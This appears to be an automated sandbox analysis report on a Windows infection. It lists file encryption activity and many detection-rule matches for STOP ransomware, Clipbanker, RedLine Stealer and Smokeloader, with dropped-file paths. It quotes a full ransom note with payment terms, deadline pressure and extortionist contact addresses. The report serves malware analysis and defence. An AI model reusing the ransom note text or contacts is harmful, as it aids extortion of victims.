                Source: C:\Users\user\AppData\Local\Temp\9721.exeFile deleted: C:\Users\user\Desktop\GRXZDKKVDB\DUUDTUBZFW.jpg
                Source: C:\Users\user\AppData\Local\Temp\9721.exeFile moved: C:\Users\user\Desktop\DUUDTUBZFW.jpg
                Source: C:\Users\user\AppData\Local\Temp\9721.exeFile deleted: C:\Users\user\Desktop\DUUDTUBZFW.jpg
                Source: C:\Users\user\AppData\Local\Temp\9721.exeFile moved: C:\Users\user\Desktop\BJZFPPWAPT\BJZFPPWAPT.docx
                Source: C:\Users\user\AppData\Local\Temp\9721.exeFile dropped: C:\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-vkvlynov9oprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshmail.topreserve e-mail address to contact us:datarestorehelp@airmail.ccyour personal id:0731josiem5ncajqyeggmkwe5mkr2fpyunjqsdp5pb5hfa467Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\9721.exeFile dropped: C:\Users\user\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-vkvlynov9oprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshmail.topreserve e-mail address to contact us:datarestorehelp@airmail.ccyour personal id:0731josiem5ncajqyeggmkwe5mkr2fpyunjqsdp5pb5hfa467Jump to dropped file

                System Summary

                barindex
                Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                Source: 38.0.build3.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                Source: 38.0.build3.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                Source: 13.2.46F.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 13.2.46F.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 31.2.3971.exe.39215a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 31.2.3971.exe.39215a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 23.2.6E6C.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 23.2.6E6C.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 34.2.3971.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 34.2.3971.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 19.2.9721.exe.38f15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 19.2.9721.exe.38f15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 24.2.46F.exe.38a15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 24.2.46F.exe.38a15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 39.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 39.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 39.2.9721.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 39.2.9721.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 12.2.9721.exe.39815a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 12.2.9721.exe.39815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 25.2.46F.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 25.2.46F.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 27.2.9721.exe.38f15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 27.2.9721.exe.38f15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 36.2.AB42.exe.38a15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 36.2.AB42.exe.38a15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 12.2.9721.exe.39815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 12.2.9721.exe.39815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 7.2.124D.exe.38c15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 7.2.124D.exe.38c15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 26.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 26.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 7.2.124D.exe.38c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 7.2.124D.exe.38c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 8.2.124D.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 8.2.124D.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 35.2.9721.exe.39e15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 35.2.9721.exe.39e15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 24.2.46F.exe.38a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 24.2.46F.exe.38a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 15.2.F42F.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 15.2.F42F.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 29.2.9721.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 29.2.9721.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 36.2.AB42.exe.38a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 36.2.AB42.exe.38a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 38.2.build3.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                Source: 38.2.build3.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                Source: 8.2.124D.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 8.2.124D.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 13.2.46F.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 13.2.46F.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 25.2.46F.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 25.2.46F.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 5.2.9721.exe.39215a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 5.2.9721.exe.39215a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 34.2.3971.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 34.2.3971.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 15.2.F42F.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 15.2.F42F.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 31.2.3971.exe.39215a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 31.2.3971.exe.39215a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 20.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 20.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 6.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 6.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 5.2.9721.exe.39215a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 5.2.9721.exe.39215a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 11.2.F42F.exe.38a15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 11.2.F42F.exe.38a15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 26.2.9721.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 26.2.9721.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 11.2.F42F.exe.38a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 11.2.F42F.exe.38a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 20.2.9721.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 20.2.9721.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 22.2.6E6C.exe.39215a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 22.2.6E6C.exe.39215a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 29.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 29.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 23.2.6E6C.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 23.2.6E6C.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 9.2.46F.exe.38b15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 9.2.46F.exe.38b15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 27.2.9721.exe.38f15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 27.2.9721.exe.38f15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 22.2.6E6C.exe.39215a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 22.2.6E6C.exe.39215a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 35.2.9721.exe.39e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 35.2.9721.exe.39e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 6.2.9721.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 6.2.9721.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 9.2.46F.exe.38b15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 9.2.46F.exe.38b15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 19.2.9721.exe.38f15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 19.2.9721.exe.38f15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 28.0.E3B7.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Detects downloader / injector Author: ditekSHen
                Source: 00000004.00000002.631890597.0000000001CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000024.00000002.694111730.000000000380C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 0000000B.00000002.650483753.0000000001DE5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000026.00000000.689655808.0000000000AD1000.00000020.00000001.01000000.00000019.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                Source: 00000026.00000000.689655808.0000000000AD1000.00000020.00000001.01000000.00000019.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                Source: 00000004.00000002.631913891.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000023.00000002.704356813.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000018.00000002.664592242.0000000001D16000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 0000000C.00000002.686813260.0000000003980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000007.00000002.636517473.0000000001BCB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000013.00000002.655311852.000000000380D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 0000001E.00000002.691480155.0000000001B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 0000001F.00000002.701349893.0000000001C93000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000023.00000002.703891224.000000000393F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000016.00000002.660464369.0000000003920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0000001E.00000002.692909496.0000000001CE1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000016.00000002.659735922.0000000001E75000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000022.00000002.704302142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000022.00000002.704302142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000004.00000002.632080495.0000000001E61000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000008.00000002.640916155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000008.00000002.640916155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000009.00000002.648394809.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0000001B.00000002.671423517.0000000003858000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000005.00000002.630815877.000000000388A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.569549766.0000000001B62000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000004.00000002.632649984.00000000039F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000001D.00000002.686383358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 0000001D.00000002.686383358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0000001E.00000002.692342997.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000026.00000002.692364725.0000000000AD1000.00000020.00000001.01000000.00000019.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                Source: 00000026.00000002.692364725.0000000000AD1000.00000020.00000001.01000000.00000019.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                Source: 00000017.00000002.661107586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000017.00000002.661107586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0000001E.00000002.695759811.0000000001D56000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 0000000B.00000002.651980343.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000000.00000002.569951973.00000000038E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000F.00000002.651586722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 0000000F.00000002.651586722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0000000C.00000002.686700698.00000000038E1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000021.00000002.694598336.0000000001D31000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 0000001B.00000002.671665065.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000000.00000002.569855669.0000000001E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000026.00000002.692220584.000000000083A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                Source: 00000026.00000002.692220584.000000000083A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                Source: 0000001F.00000002.703237929.0000000003920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000019.00000002.798083058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000019.00000002.798083058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000027.00000002.705832212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000027.00000002.705832212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000000.00000002.569716746.0000000001DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 0000001A.00000002.707784475.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 0000001A.00000002.707784475.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000009.00000002.648114882.0000000001D22000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000024.00000002.694197467.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000007.00000002.637838144.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000014.00000002.797952336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000014.00000002.797952336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000013.00000002.656069794.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0000000D.00000002.659138526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 0000000D.00000002.659138526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000018.00000002.667734975.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 9721.exe PID: 5512, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 9721.exe PID: 7060, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 124D.exe PID: 7152, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 124D.exe PID: 6684, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 46F.exe PID: 2888, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: F42F.exe PID: 4572, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 9721.exe PID: 3332, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 46F.exe PID: 3112, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: F42F.exe PID: 4768, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 9721.exe PID: 5192, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 9721.exe PID: 5864, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 6E6C.exe PID: 2148, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 6E6C.exe PID: 4608, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 46F.exe PID: 5308, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 46F.exe PID: 5000, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 9721.exe PID: 5024, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 9721.exe PID: 5384, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 9721.exe PID: 5792, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 9721.exe PID: 4560, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: C:\Users\user\AppData\Local\537f7094-d60c-4d6f-ab72-afcba0f739b8\build3.exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                Source: C:\Users\user\AppData\Local\537f7094-d60c-4d6f-ab72-afcba0f739b8\build3.exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
